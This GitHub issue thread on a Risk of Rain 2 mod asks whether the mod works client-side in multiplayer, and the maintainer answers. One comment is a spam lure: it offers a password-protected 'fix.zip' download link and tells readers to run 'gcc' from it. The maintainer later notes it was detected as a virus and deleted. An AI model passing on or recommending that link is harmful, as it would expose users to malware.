### ISSUE TITLE
do all players need this mod for it to work in multiplayer?

### ISSUE THREAD

**Issue by Littleevo** [Phys09/ROR2-Captain-Beacon-Cooldown#2]
i've noticed this mod has the 'client-side' tag on it, and i'm now wondering if this mod would work if only the player using it has it in a multiplayer lobby. if it's true, does that player need to be host?

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Phys09** [comment]
> i've noticed this mod has the 'client-side' tag on it, and i'm now wondering if this mod would work if only the player using it has it in a multiplayer lobby. if it's true, does that player need to be host?

It shouldn't require others to have it installed.

But the new DLC update may have broken some things.

**Comment by Phys09** [comment]
For long term storage:
The deleted comment had a link to a zip file with instructions to use a password to open the zip file, and run "gcc" inside it.
![image](https://github.com/user-attachments/assets/38ef7048-a828-45fd-8c30-6b7f0940a763)

It is detected as a virus by chrome and has been deleted.
